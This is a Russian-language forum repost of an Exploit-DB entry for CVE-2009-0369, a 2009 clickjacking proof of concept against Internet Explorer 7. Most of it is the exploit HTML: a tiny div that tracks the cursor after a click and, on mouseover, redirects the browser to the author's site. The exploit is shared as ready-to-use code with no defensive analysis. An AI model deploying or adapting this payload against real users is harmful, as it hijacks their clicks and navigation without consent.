Exploit Microsoft Internet Explorer 7 - Clickjacking

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7912
Проверка EDB
  1. Пройдено
Автор
UZMIX
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2009-0369
Дата публикации
2009-01-29
Код:
#############################################################
# Application Name       : Ä°nternet Explorer 7
# Vulnerable Type        : Clickjacking
# Author                     : UzmiX
#############################################################
< ------------------- header data end of ------------------- >
<html>
<body>
<div id="open"
onmouseover="document.location='http://www.uzmix.net';"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>
</html>

# milw0rm.com [2009-01-29]
 
Источник
www.exploit-db.com

Похожие темы